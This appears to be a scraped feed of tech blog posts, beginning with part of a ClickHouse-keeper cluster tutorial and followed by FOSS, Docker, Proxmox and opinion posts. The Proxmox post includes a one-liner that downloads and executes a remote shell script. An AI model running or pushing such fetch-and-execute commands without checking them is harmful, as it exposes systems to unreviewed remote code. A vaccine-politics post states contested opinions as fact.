clickhouse-green-1 │ 2021-12-17 09:36:16 │ -689113926 │ 2a944d71-73f3-4491-b851-4f0e6f296e44 │\n└────────────────────┴─────────────────────┴────────────┴──────────────────────────────────────┘\nPerfect! We can see our data is sharded as some parts of it exists in green and blue. We can also see that for each record, we have 2 entries thus confirming that ReplicatedMergeTree is doing its job!\nAdditional Scenarios#\nAll is well and good so far, but to ensure that our cluster setup is resilient we need to introduce our cluster to some Non-Happy scenarios.\nStop a replica node#\n\n❯ docker-compose stop clickhouse-green-2 \nStopping clickhouse-green-2 ... done\nNow, let’s query our records:\nSELECT count(*)\nFROM app.events_main\n\n┌─count()─┐\n│       4 │\n└─────────┘\nThat seems right. 
We’re able to access all our data with just one replica down.\nLet’s try inserting data and bring back the replica to see if it got automatically replicated or not:\nINSERT INTO app.events_main VALUES (now(), rand(1), generateUUIDv4());\n\nOk.\nSELECT *\nFROM app.events_main\nORDER BY time DESC\nLIMIT 1\n\n┌────────────────time─┬──event_id─┬─uuid─────────────────────────────────┐\n│ 2021-12-17 10:09:10 │ 375826335 │ 8dbbc9cf-8f00-4cc3-a4fb-0f17a68340e5 │\n└─────────────────────┴───────────┴──────────────────────────────────────┘\nLet’s start the replica again:\n❯ docker-compose start clickhouse-green-2\nStarting clickhouse-green-2 ... done\nOn querying the replica to see if it has the data:\nSELECT\n    hostName(),\n    *\nFROM remote('172.20.0.5', 'app', 'events_local')\nORDER BY time DESC\nLIMIT 1\n\nQuery id: 422041dc-afe8-4f28-9659-6d58726f8c90\n\n┌─hostName()─────────┬────────────────time─┬──event_id─┬─uuid─────────────────────────────────┐\n│ clickhouse-green-2 │ 2021-12-17 10:09:10 │ 375826335 │ 8dbbc9cf-8f00-4cc3-a4fb-0f17a68340e5 │\n└────────────────────┴─────────────────────┴───────────┴──────────────────────────────────────┘\nPerfect! The record 375826335 automatically got replicated once the replica was healthy.\nStop a Keeper Node#\n\nWe’ll stop a server instance that is running the clickhouse-keeper process. By doing this, we’ll also be killing a replica, but that is okay.\n❯ docker-compose stop clickhouse-blue-2\nStopping clickhouse-blue-2 ... done\nLet’s insert some data:\nINSERT INTO app.events_main VALUES (now(), rand(1), generateUUIDv4());\n\nOk\nWe can check the server information of the other 2 keeper nodes:\n$ echo stat | nc 127.0.0.1 9181 | grep Mode\nMode: follower\n$ echo stat | nc 127.0.0.1 9183 | grep Mode\nMode: leader\nSo, one of the keeper nodes has elected itself to be the leader and we have no problems in the setup so far. However, if we stop another keeper node, then there will be only keeper node remaining in the setup and to avoid a Split Brain issue, it won’t be able to elect itself as the leader.\n\nWhat happens then? Only one way to find out:\n❯ docker-compose stop clickhouse-blue-1\nStopping clickhouse-blue-1 ... done\nINSERT INTO app.events_main VALUES (now(), rand(1), generateUUIDv4());\n\nReceived exception from server (version 21.12.2):\nCode: 242. DB::Exception: Received from localhost:9000. DB::Exception: Table is in readonly mode (zookeeper path: \u002Fclickhouse\u002Ftables\u002Fevents\u002Fgreen\u002Ftable). (TABLE_IS_READ_ONLY)\nAh! So, we can still query for the data (which will be incomplete since blue shard is completely down), but we cannot insert any new data at all. We can even verify this by querying for the health of the keeper node:\n$ echo mntr | nc localhost 9183            \nThis instance is not currently serving requests%                                                                                                                              \nAdd a new shard#\n\nAlright, so our tests so far have been quite good and show that the cluster is resilient to failures as long as there exists a keeper node running as leader mode in the quorum. Now, let’s see how to add a new shard. 
We’ll extend our docker-compose.yml to add a new orange shard:\n  clickhouse-orange-1:\n    \u003C\u003C: *clickhouse-defaults\n    container_name: clickhouse-orange-1\n    hostname: clickhouse-orange-1\n    ports:\n      - 9004:9000\n      - 8127:8123\n      - 9185:9181\n    volumes:\n      - type: volume\n        source: ch-orange-1-data\n        target: \u002Fvar\u002Flib\u002Fclickhouse\n      - \".\u002Fconfigs\u002Fgen\u002Fclickhouse-orange-1:\u002Fetc\u002Fclickhouse-server\u002Fconfig.d\u002F\"\nInside our remote_servers.xml, we’ll add the orange shard as well:\n \u003Cshard>\n     \u003Cinternal_replication>true\u003C\u002Finternal_replication>\n     \u003Creplica>\n         \u003Chost>clickhouse-orange-1\u003C\u002Fhost>\n         \u003Cport>9000\u003C\u002Fport>\n     \u003C\u002Freplica>\n \u003C\u002Fshard>\nThat’s pretty much it. Let’s start the new node:\ndocker-compose up\nLet’s insert some data and query whether the shard is getting data or not:\nSELECT\n    hostName(),\n    *\nFROM remote('172.20.0.2', 'app', 'events_local')\n\nReceived exception from server (version 21.12.2):\nCode: 519. DB::Exception: Received from localhost:9000. DB::Exception: All attempts to get table structure failed. Log: \n\nCode: 279. DB::NetException: All connection tries failed. Log: \n\nThere is no table `app`.`events_local` on server: 172.20.0.2:9000\n\n. (ALL_CONNECTION_TRIES_FAILED) (version 21.12.2.17 (official build))\n\n. (NO_REMOTE_SHARD_AVAILABLE)\nHouston, we have a problem.\n> There is no table `app`.`events_local` on server: 172.20.0.2:9000\nThis is mentioned in the ClickHouse docs on Replication:\nCREATE, DROP, ATTACH, DETACH and RENAME queries are executed on a single server and are not replicated:\nThis means that although we ran the CREATE DATABASE and CREATE TABLE commands using ON CLUSTER, which executes on all servers, the orange-1 node was introduced after we ran those commands, so we need to manually create the DB and table here. We have to execute the commands below inside the orange-1 node:\nCREATE DATABASE app;\n\nCREATE TABLE app.events_local (\n    time DateTime,\n    event_id  Int32,\n    uuid UUID\n)\nENGINE = ReplicatedMergeTree('\u002Fclickhouse\u002Ftables\u002F{cluster}\u002F{shard}\u002F{table}', '{replica}')\nPARTITION BY toYYYYMM(time)\nORDER BY (event_id);\nThat’s all that is required. Adding a new replica follows the same process.\nSummary#\nHope this tutorial helped you figure out how to use clickhouse-keeper to set up a distributed ClickHouse cluster.
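As a wrap-up, the health checks used throughout this post condense into a small script you can re-run after changes like this (a sketch; host ports are the ones published in the compose file, and the cluster name events comes from remote_servers):\n#!\u002Fusr\u002Fbin\u002Fenv bash\n# Smoke-test the cluster: keeper liveness, leader election, and replica layout.\nfor port in 9181 9182 9183; do\n    printf 'keeper %s: ' \"$port\"\n    echo ruok | nc 127.0.0.1 \"$port\"   # each live keeper answers \"imok\"\n    echo\ndone\necho stat | nc 127.0.0.1 9183 | grep Mode   # exactly one keeper should report \"leader\"\nclickhouse-client --port 9000 --query \"SELECT host_name, replica_num FROM system.clusters WHERE cluster = 'events'\"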
clickhouse-keeper is still a relatively new feature, as the docs already mention, but given that it removes the operational overhead of running a Zookeeper cluster, it’s worth checking out.\nReferences#\nhttps:\u002F\u002Fwww.youtube.com\u002Fwatch?v=abhcCRW09Ac\n\nSlides used in above talk: https:\u002F\u002Fpresentations.clickhouse.com\u002Fmeetup54\u002Fkeeper.pdf\nhttps:\u002F\u002Fclickhouse.com\u002Fdocs\u002Fen\u002Foperations\u002Fclickhouse-keeper\nhttps:\u002F\u002Fgithub.com\u002FClickHouse\u002FClickHouse\u002Ftree\u002Fmaster\u002Ftests\u002Fintegration\u002Ftest_keeper_multinode_simple\nhttps:\u002F\u002Fgithub.com\u002FClickHouse\u002FClickHouse\u002Fissues\u002F2161\nFor the full code\u002Fconfig samples, you can check out the repo.\nFin!\nUpdates#\nIf you have set up RBAC on your cluster, make sure you add \u003Cuser> and \u003Cpassword> fields to the \u003Cremote_server> configuration.",[],{"slug":1823,"title":1824,"link":1825,"pubDate":1826,"contentSnippet":1827,"tags":1828,"maintainerName":202,"maintainerUsername":203,"maintainerPhoto":204,"feedUrl":205},"open-source-is-not-broken","\"Open source\" is not broken","https:\u002F\u002Fnadh.in\u002Fblog\u002Fopen-source-is-not-broken\u002F","Sun, 12 Dec 2021 00:00:00 +0000","I read this article (“Open Source” is Broken by Xe) written in the aftermath of the unfortunate log4j2 fiasco. The author discusses a pertinent problem that has plagued the FOSS (Free and Open Source) world ever since large for-profit corporations started their widespread consumption of FOSS, ever since countless “unicorns” raised infinite amounts of funding on valuations built pretty much entirely on FOSS, ever since FOSS got co-opted into corporatisation and capitalisation. And yet, countless maintainers of critical and widely used FOSS struggle to make a living.",[],{"slug":1830,"title":1831,"link":1832,"pubDate":1833,"contentSnippet":1834,"tags":1835,"maintainerName":611,"maintainerUsername":612,"maintainerPhoto":613,"feedUrl":614},"proxmox-discord","Dark Mode for Proxmox","https:\u002F\u002Fshrirangkahale.com\u002Fposts\u002Fproxmox-discord\u002F","Fri, 10 Dec 2021 15:12:24 +0530","How to make the Proxmox UI beautiful: I use Proxmox daily for virtual machines and LXC containers. It is one of the best virtualization platforms that utilizes KVM, and it’s FOSS, but the default UI is too bright and I prefer darker themes.\nDiscord-PVE: Discord-PVE is a Discord-style theme for the Proxmox Virtual Environment; it uses a custom stylesheet.\nTo install it, run this one-liner:\nbash \u003C(curl -s https:\u002F\u002Fraw.githubusercontent.com\u002FWeilbyte\u002FPVEDiscordDark\u002Fmaster\u002FPVEDiscordDark.sh ) install This looks so much better https:\u002F\u002Fgithub.",[],{"slug":1837,"title":1838,"link":1839,"pubDate":1833,"contentSnippet":1840,"tags":1841,"maintainerName":611,"maintainerUsername":612,"maintainerPhoto":613,"feedUrl":614},"dns-docker","Setting DNS for containers in a docker environment","https:\u002F\u002Fshrirangkahale.com\u002Fposts\u002Fdns-docker\u002F","Setting DNS in a docker environment: I have a DNS resolver running on my homeserver (AdGuard Home), which also acts as an adblocker. But the host firewall is configured to only accept traffic from my home LAN (10.0.1.0\u002F24). The containers, meanwhile, are isolated and do not share the same IP range as my LAN; this leads to DNS queries failing inside the containers.
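One common way to handle this (a sketch of the general approach, not necessarily the fix this post eventually lands on; 10.0.1.2 is a hypothetical LAN address for the AdGuard Home resolver) is to point Docker’s DNS at the LAN resolver and let the firewall admit the bridge subnet:\n# \u002Fetc\u002Fdocker\u002Fdaemon.json sets the default DNS for all containers:\n{\n  \"dns\": [\"10.0.1.2\"]\n}\n# then restart the daemon, and allow the Docker bridge range through\n# the host firewall (subnet here is Docker's default; adjust to yours):\n#   systemctl restart docker\n#   ufw allow from 172.17.0.0\u002F16 to any port 53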
I have noticed that all my containers default to 8.",[],{"slug":1843,"title":1844,"link":1845,"pubDate":1846,"contentSnippet":1847,"tags":1848,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"breaking-software","Breaking Software and Getting Older","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fbreaking-software\u002F","2021-12-09T02:40:55.000Z","Recently, I’d posted on Twitter that my feed has become messy over time. Maybe I followed some accounts that were of no interest, maybe Twitter’s algos don’t really know what to show me. Whatever; I wanted a fresh start. And I’ve done this in the past: I’ve removed all the accounts that I follow but which don’t follow me back. This little trick is helpful to start afresh while still not offending your friends ;)\n\nI’d written a really simple Python script to do the job! It looks like:\nimport tweepy\n\n# Note: written against tweepy 3.x and Twitter's v1.1 API\nSCREEN_NAME = 'mrkaran_'\nCONSUMER_KEY = ''\nCONSUMER_SECRET = ''\nACCESS_TOKEN = ''\nACCESS_TOKEN_SECRET = ''\n\nauth = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)\nauth.set_access_token(ACCESS_TOKEN, ACCESS_TOKEN_SECRET)\napi = tweepy.API(auth)\n\n# IDs of accounts that follow me, and accounts I follow\nfollowers = api.followers_ids(SCREEN_NAME)\nfriends = api.friends_ids(SCREEN_NAME)\n\n# Unfollow everyone who doesn't follow me back\nfor f in friends:\n    if f not in followers:\n        print(\"Unfollow {0}?\".format(api.get_user(f).screen_name))\n        api.destroy_friendship(f)\nI’d last run this in 2019 or so. That is dinosaur ages in the world of software. All I wanted to do was run this goddamn script again, 2 years later. Seems to be too much of an ask? Apparently tweepy, the library used here to interact with Twitter’s APIs, had a major release with lots of breaking changes. They’ve internally migrated to the v2 Twitter API. So, when I naively ran pip install tweepy, my code threw:\n❯ python main.py    \nTraceback (most recent call last):\n  File \"\u002Fhome\u002Fkaran\u002FCode\u002FPersonal\u002Ftwitter-unfollow\u002Fmain.py\", line 13, in \u003Cmodule>\n    followers = api.followers_ids(SCREEN_NAME)\nAttributeError: 'API' object has no attribute 'followers_ids'\nSo, some method name changed. But that’s not all. The whole auth process, including the initialisation of the API object, changed as well. I spent some ~15 minutes grokking the docs but got frustrated because 1) I don’t give a shit about v2\u002Fv1 APIs. 2) I just want to carry on with whatever I was doing. Why is this shit taking more time than I care to give it?\nI’d have cared enough if it was a side-project I maintained or something that I used daily. A utility like this, which gets used once in a couple of years, will see more such breaking changes in the future. Why, then, should I spend time migrating to v2 APIs, when after 2 years, v3 APIs would have broken my code again? What is the damn point? Why can’t software just keep working without troubling its users?\nIn the end, I just installed the last version that works with v1 APIs and ran the script.\nI get breaking changes, I totally do. And I’ve no qualms with Tweepy. They did what they had to, in order to be compatible with v2. I am just angry\u002Fsad at the whole ecosystem of “Move fast, break things”.\nPlease. Slow.
Down.\nSo that the rest of us who have a life can enjoy it and not spend an entire weekend migrating across versions!\nSigh",[],{"slug":1850,"title":1851,"link":1852,"pubDate":1853,"contentSnippet":1854,"tags":1855,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"choosing-distro","How I choose my distros","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fchoosing-distro\u002F","Tue, 07 Dec 2021 00:00:00 +0000","If you don’t know what a distro is, I will explain that in a minute.\nFirst, I would like to ask you a question:\nWhich operating system do you use?\nDo you use Microsoft Windows?\nDo you use MacOS?\nOr do you use Ubuntu?\nWhy do you use whatever you use?\nIn this post, I will share the reasoning behind choosing the operating systems I use and why it matters.\nWhat is a distro? There are many operating systems known as GNU\u002FLinux (actually, they are erroneously known as “Linux”; please read this article for an explanation of why we call it GNU\u002FLinux and not Linux). The members of the family of GNU\u002FLinux systems are called distros.\nI don’t use Microsoft Windows or MacOS because they are nonfree\u002Fproprietary software. And the symptoms of them being nonfree software are that they are malware and mistreat their users in many ways.\nI do not want to use any nonfree software. So, for example, Ubuntu has nonfree software in its repositories, and the version of Linux, the kernel, included in Ubuntu contains firmware blobs. That is not the kind of distro I would like to run.\nRight now, I am using PureOS because it does not have any nonfree software in its repositories, does not ship with any nonfree firmware, and follows the Free System Distribution Guidelines (GNU FSDG), and so it is a GNU\u002FFSF-endorsed distro. Also, PureOS is ideologically inclined towards Free Software and values users’ freedom and privacy.\nFurther, PureOS is maintained by Purism, a company which is very committed to the freedom and privacy of users. Purism is developing hardware, like mobile phones and laptops, which can run exclusively on fully free software. I support their work, and when I tell someone I use PureOS, they might want to look it up, and so it will raise awareness about Purism and their work.\nAnother distribution I use and endorse is Debian GNU\u002FLinux, as it does not ship with any nonfree firmware and does not have any nonfree packages in its main repositories. I know GNU does not endorse Debian, but I think Debian is a good freedom-respecting distro. Like PureOS, Debian is also ideologically inclined towards the free software philosophy. Debian adheres to the Debian Social Contract as well, which is committed to free software. Plus, Debian has an inclusive community which is very welcoming to all. The decision-making of the Debian community is democratic in nature.\nFurther, I occasionally use other distros endorsed by GNU, because they are committed to the Free Software philosophy and contain no nonfree\u002Fproprietary software by default.\nSummarizing the above discussion, I choose distros if they match the following criteria:\nIt should respect my freedom and privacy;\nIt should be ideologically inclined to the free software philosophy.\nA distro being free software is not enough. When I use PureOS, other people will learn about Free Software and Purism. This is not the case with, say, Fedora or Ubuntu, as they are not committed to free software (shipping with nonfree firmware by default is one example of this), although the operating systems are themselves Free Software.
I suggest the same to you if you support free software.",[],{"slug":1857,"title":1858,"link":1859,"pubDate":1860,"contentSnippet":1861,"tags":1862,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"covid-vaccine-profit-over-people","Covid Vaccine- A Case Of Prioritizing Greed Of A Few Over Public Health","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fcovid-vaccine-profit-over-people\u002F","Sat, 04 Dec 2021 00:00:00 +0000","Look at the image below:\nSource: Wikipedia's version of the file uploaded on 3-December-2021 \n\nWhat does the above image illustrate?\nThe image demonstrates how unequal the Covid-19 vaccine distribution has been across countries.\nQuoting the official data on Covid vaccines,\n54.9% of the world population has received at least one dose of a COVID-19 vaccine.\nOnly 6.2% of people in low-income countries have received at least one dose.\n(on 4th December 2021)\nWhy is it so?\nIs there a scarcity of vaccine units, or is the vaccine being developed at a slow rate?\nNo!\nIn fact, vaccine production is accelerating, but wealthy countries are intentionally restricting access. Also, developed countries have preordered more vaccines than they require, and there are only a few companies developing these vaccines, which means that people in low-income developing countries may not receive vaccinations from these manufacturers until 2023 or 2024.\nWhy is this so? This is where the profit of pharmaceutical companies comes in, and Bill Gates too.\nBasically, the Covid vaccine is patented (a patent is a legal right given to someone which excludes others from making or selling an “invention”), and pharma companies other than those who hold the patent on the vaccine cannot produce it.\nWhen Oxford planned to allow all companies to manufacture its Covid vaccine, Bill Gates convinced them to cancel this plan. Another article. This is because Bill Gates prioritizes his profit over people’s health.\nNext, Bill Gates came up with a scheme named Covax which, instead of removing the artificial restrictions from the vaccine and allowing independent companies to develop it, plans to charge a high amount of money to wealthy countries and then donate the vaccines to poor countries.\nCompanies participating in Covax will be able to set their own prices, without any transparency and accountability. They won’t have to face any legal liability for any potential damages caused by the vaccine made by them. This is what companies want– to earn as much as possible without any transparency and accountability for their actions.\nSo, basically, what is going on is that the taxpayers of rich countries are paying the higher prices set by pharma companies so that they can donate the vaccines to low-income countries, rather than allowing local manufacturers in poor countries to develop their own vaccine. The vaccine distribution could have been better in low-income countries if local manufacturers had been allowed to develop the vaccine. Poor countries are doomed to suffer because of the greed of corporations. Here is a good article explaining how patents are a barrier to vaccine distribution.
Additionally, this scheme would also affect rich countries’ economies.\n Source:  The Economist Intelligence Unit \n\nIn fact, an executive of one vaccine manufacturer said there would be a chance for them to raise prices for the vaccine when COVID moves from a pandemic state to an endemic situation and the virus circulates continually in pockets around the globe. When everyone is safe, Covid will be over. Instead, the company wants the opposite, so that the virus spreads and they can earn more profit.\nThis scenario is not unique to the Covid vaccine. Billionaires like Bill Gates have a large influence on public health policies. The root of the problem is capitalism– profit over people, or in other words, a system which incentivizes greed over everything else. It is a customary practice for the rich to invent schemes like this to remain rich at the expense of others. No surprise that they wouldn’t treat the Covid vaccine any differently.\n Articles for further reading:\n\n\nHow Bill Gates Impeded Global Access to Covid Vaccines\nHow Pfizer Silences World Governments in Vaccine Negotiations\nThe article mentions:\nPfizer silences governments through the use of nondisclosure provisions in many of its contracts. Brazil, for example, is prohibited from making “any public announcement concerning the existence… or terms” of the contract or commenting on its relationship with Pfizer without Pfizer’s prior written consent.\nPfizer can disallow governments from accepting additional donations of the Pfizer vaccine.\nPfizer exempts itself from liability for patent infringements, shifting the financial risk of Pfizer’s actions to government purchasers – despite Pfizer’s opposition to similar exemptions for manufacturers proposed at the World Trade Organization.\nIt gives the power to secret private arbitrators, not public courts, to decide issues on contract disputes.\nPfizer requires some countries to waive sovereign immunity, so it can go after state assets in case of a dispute.\nPfizer gives itself sole power when it comes to making key decisions, including how vaccine deliveries will be prioritized if there is a supply shortage.\nAnother article for more information.\nPressuring low-income countries.\nModerna not sharing its technology, stopping the poorest nations from producing the shot themselves.",[],{"slug":1864,"title":1865,"link":1866,"pubDate":1867,"contentSnippet":1868,"tags":1869,"maintainerName":611,"maintainerUsername":612,"maintainerPhoto":613,"feedUrl":614},"whoogle-1","Whoogle: A privacy friendly search engine","https:\u002F\u002Fshrirangkahale.com\u002Fposts\u002Fwhoogle-1\u002F","Fri, 26 Nov 2021 15:12:24 +0530","What is Whoogle? Whoogle is a privacy-friendly (meta) search engine. It uses Google for its data, but without any ads, JavaScript, AMP links, cookies, or IP address tracking. It’s free and open-source software.\nWhy use Whoogle? If you didn’t know, a great chunk of Google’s revenue comes from ads and tracking.
They use their services to gather users’ private data and use it for their own benefit; privacy is extremely important.",[],{"slug":1871,"title":1872,"link":1873,"pubDate":1874,"contentSnippet":1875,"tags":1876,"maintainerName":202,"maintainerUsername":203,"maintainerPhoto":204,"feedUrl":205},"on-powered-by-ai-marketing","On \"Powered by AI \u002F ML\" marketing","https:\u002F\u002Fnadh.in\u002Fblog\u002Fon-powered-by-ai-marketing\u002F","Fri, 26 Nov 2021 00:00:00 +0000","An email I had sent in response to a survey on the use of “AI \u002F ML” and the “AI-first mindset” in our organisation and in the industry was shared on social media[1] [2] sparking surprising amounts of interest. I did candidly state the simple fact that we haven’t come across any big problems that warrant any specific “AI \u002F ML” solutions in our organisation yet (Zerodha - stock broker that offers online investment and trading platforms), and that the bulk of the “powered by AI” claims we have seen across industries and in the numerous startup pitches that we receive, have been cases of hollow marketing. There is also a general expectation (delusion) that any sufficiently large technology company should be using “AI \u002F ML” somehow, somewhere, for some reason.",[],{"slug":1878,"title":1879,"link":1880,"pubDate":1881,"contentSnippet":1882,"tags":1883,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"free-software-explained-simply","Free Software Explained Simply","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Ffree-software-explained-simply\u002F","Thu, 25 Nov 2021 00:00:00 +0000","The article was updated on 03 December 2021 to illustrate what source code means.\nLet’s say your refrigerator develops some problem and stops working. You don’t know how to repair it. There is a repair shop in your town, but the components of the refrigerator are sealed and no spare components are available in the market. Every company makes its own components, which are not compatible with other companies’ refrigerators. That means you need to go to the same company to get it repaired, even though the mechanic in the shop near your house could have repaired it if it had not been intentionally locked by the manufacturer. Unfortunately, it is the weekend and the company’s services are not available on weekends.\nThen you book an appointment on Monday and wait a few days for your turn. When your turn comes, the company takes the refrigerator and “diagnoses” it for a few days. Then they return your call saying that it will take ₹ 50,000 to repair it, while you can get a brand-new refrigerator for ₹ 60,000. So, frustrated, you buy a new refrigerator.\nThe story tells us the importance of the freedom that we enjoy in our daily life. In the above story, you could have had the refrigerator repaired locally if you had the freedom to see what’s inside your device. But that didn’t happen, simply because the company intentionally locked it and made sure that only they can repair the products they sell.\nNow think of the same scenario in software. Let’s say you found a problem in the software you are working on. You are not a programmer, but other people who know programming could fix that problem. All software is made of some human-readable code, which we call source code, which is then compiled for the computer. Software receives instructions from the code, and it does whatever the source code commands it to. You realize that the code the software is built from has not been made available to you by the developer of that software.
This leaves programmers other than the developer in no position to fix the problem or even inspect what is wrong with the software. Similar to the refrigerator story above, the software’s source code is intentionally kept secret from you, and due to that restriction, you cannot get the problem fixed.\nYou try to contact the developer and report the problem, but there is no response. Then you try to switch to some other software, but those programs lack other crucial features which the previous one had. You now think that if you had the code, there would have been a possibility of fixing the problem. In this situation, you have to wait for the developer to fix the problem, use some other software, or make your own from scratch just to fix one problem, even though fixing the existing software would surely have been less hassle than writing it from scratch.\nAlso, as we discussed earlier, software takes commands from the source code. That means whoever has the source code has full control over that software. If the user does not have the source code, then the user does not control the software.\nWhat is source code?\nWell, what is source code? To illustrate, I would like to show you a simple piece of code. Don’t worry if you do not understand it. I am only showing it to make my point.\nSee the following HTML code:\n\t\u003C!DOCTYPE html>\n\n\t\u003Chtml>\n\n\t\u003Cbody>\n\n\t\u003Ch1 style=\"color:Red;\">Hello World\u003C\u002Fh1>\n\n\t\u003Cp style=\"color:Blue;\">I am Ravi\u003C\u002Fp>\n\n\t\u003Cp style=\"color:Purple;\">What color is this text?\u003C\u002Fp>\n\n\t\u003C\u002Fbody>\n\n\t\u003C\u002Fhtml>\n\nWhen I write these lines in a text editor, save the file as test.html and open test.html in a browser, it looks like the following image:\n[screenshot not reproduced in this snippet]\nNow, if I change the color from Red to Green in the heading of the code above, save the file and open it in the browser again, the heading becomes green in color. The modified code is:\n\t\u003C!DOCTYPE html>\n\n\t\u003Chtml>\n\n\t\u003Cbody>\n\n\t\u003Ch1 style=\"color:Green;\">Hello World\u003C\u002Fh1>\n\n\t\u003Cp style=\"color:Blue;\">I am Ravi\u003C\u002Fp>\n\n\t\u003Cp style=\"color:Purple;\">What color is this text?\u003C\u002Fp>\n\n\t\u003C\u002Fbody>\n\n\t\u003C\u002Fhtml>\n\nSee the below screenshot for this code:\n[screenshot not reproduced in this snippet]\nNotice how a change in the code changes the color of the heading in the screenshots. You can make all sorts of changes in the code and make the text whatever you like. Try copying the code into a text editor and saving it as filename.html, where you can replace ‘filename’ with any name of your choice, and make changes to the text or color to play around and see it for yourself.\nThe conclusion here is: the person\u002Fentity who has the source code of the software controls the software. For example, Microsoft has the source code of Microsoft Windows, and therefore the software is in the control of Microsoft. The source code of WhatsApp is with Facebook, so Facebook controls it. Users do not control the software if they do not have the source code.\nDefining Free Software\nWith the above discussion, I wanted to illustrate that you cannot repair a piece of software if you do not have the source code, and that you do not control the software if you do not have the source code. So the user must have the source code, so that they can inspect and modify it according to their needs. In the above example, even if the source code were available to you, you would also require the freedom to share the software with people who know programming.
It is analogous to showing the refrigerator to a mechanic in the above example so that they can repair it.\nNow let’s say you have the source code of a program and the freedom to share it with others. There is a problem in that program you would like to fix. Someone who knows how to fix the problem will modify the source code and give you their modified version so that your problem gets solved.\nWhen the software guarantees all the above-mentioned freedoms and, in addition, the freedom to run the software for any purpose, we call it Free Software. Free Software is a matter of liberty, not price. So ‘Free’ in ‘Free Software’ means freedom and not price. It is also called Libre Software or Swatantra Software or Mukt Software to emphasize that it is about freedom and not price. Think of free as in free speech, not as in free meal.\nThe following poster gives the definition of Free Software:\n\n\nCredits: Jeison Yehuda Amihud\n\nSource: https:\u002F\u002Fwww.gnu.org\u002Fgraphics\u002Famihud-4-freedoms.html\n\nLICENSE: CC-BY-SA 4.0\n \n\nExamples of Free Software\nCheck my Free Software List for some examples of Free Software.\nAn example is Scribus, a desktop publishing program used for publishing newspapers, magazines, etc. Scribus initially supported publishing only in Latin-script languages. The Oman government funded the addition of a feature to Scribus, through which Arabic support was added. Thanks to this, Scribus also got Malayalam support, and many newspapers now use Scribus to publish. The full story is here. It goes to show the value of freedom. Scribus is free software, which means it respects all the four freedoms mentioned in the poster. Because the source code was available, developers could add a feature and then use freedom 3 to share the modifications with others, so that everyone, including nonprogrammers, benefited.\nAnother example is a free software program named GNUKhata. Its development is funded by the Kerala government. Due to the freedom given by Free Software, GNUKhata is customizable, and thanks to that customizability it now supports many Indian languages, and many features like GST compliance were added. Since much proprietary accounting software is very costly and cannot be bought outright but only used against a license fee paid annually or periodically, many small businesses cannot afford it. GNUKhata can be downloaded free of cost, and users and businesses do not have to pay any license fee or ask for permission to use it.\nThink of what the world would have been like without Free Software, and what would have happened in the above-mentioned examples if there were no Free Software.\nCredits: Thanks to Ravish, Praveen and Snehal for reviewing the article and giving suggestions.",[],{"slug":1885,"title":1886,"link":1887,"pubDate":1881,"contentSnippet":1888,"tags":1889,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"what-does-facebook-outage-teach-us","What Does The Facebook Outage Teach Us","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fwhat-does-facebook-outage-teach-us\u002F","On the 4th of October 2021, Facebook, Instagram and WhatsApp were down for more than 6 hours. This had a huge impact on many of their users, with devastating effects for many. During the outage, many users flocked to Twitter, Discord, Signal, and Telegram, resulting in disruptions on those apps’ servers.\nMany businesses, which rely on Facebook’s services for their business, were down.
In many countries, Facebook is synonymous with the internet, and therefore people’s communications, businesses, payments and humanitarian work got disrupted. The outage temporarily broke the ability of some Facebook employees to access company buildings and conference rooms with their badges. And every third-party site that relies on “log in with Facebook” didn’t work either.\nWhat does this teach us? That Facebook’s services are centralized (they are controlled by a single entity). They are a single point of failure and control. A single company like Facebook controlling a large part of communications is no different from a dictator. You are at their mercy.\nThis tells us that the whole world relying on a single company for all its communications, businesses etc. is not sustainable.\nIn addition, such a service can be sold to any other company, like WhatsApp was sold to Facebook. So, even if the service is good today, it can become bad in the future– for example, by being sold to another company or by a change of privacy policy. It is also easier for governments to ban such a service.\nFacebook is so bad for many reasons that my advice to you is to delete your Facebook account.\nNow, what can we do about it?\nI do not use any centralized service, be it Signal, Twitter or Telegram. I use decentralized and federated services. Email is an example of federation. A @gmail.com user can write mails to a @yahoo.com user and vice versa. This gives a choice of service providers, and therefore the entire communication system of the world does not depend on one service. If one service goes down, it won’t disrupt the communications of the whole world.\nExamples of decentralized services are: Jitsi Meet (a video-calling software), the Searx search engine, etc. They can be self-hosted by anyone on their own server. This gives users a choice of service providers.\nExamples of federated networks are: the Fediverse, XMPP, Matrix etc.\nXMPP is a chat protocol. There are many services a user can register with and still talk to another XMPP user who is registered on another XMPP service. This choice of service providers ensures that users are not locked into a single provider.\nTo get started with XMPP, you can use Quicksy on Android, whose onboarding process is similar to WhatsApp’s and Telegram’s. However, Quicksy users can talk to users registered with other XMPP providers, and so they are not locked in to the service. If one XMPP service shuts down or changes its policy, users can switch to another provider without going to the trouble of convincing every contact to switch to a new service. Compare this with WhatsApp, Signal and Telegram: if they change their policy or you disagree with these providers in the future, you need to convince every contact to switch to a new service.\nThe bottom line is that Facebook’s outage is a reminder that they are a single point of failure, and other centralized services are no different in this respect. Switch to decentralized and federated services instead, rather than being locked into a single provider for all your needs.",[],{"slug":1891,"title":1892,"link":1893,"pubDate":1894,"contentSnippet":1895,"tags":1896,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"scribus","Scribus: When Freedom-Respecting Software Saved The Day","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fscribus\u002F","Wed, 24 Nov 2021 00:00:00 +0000","Janayugom is a newspaper in Kerala, India, which publishes news in the Malayalam language.
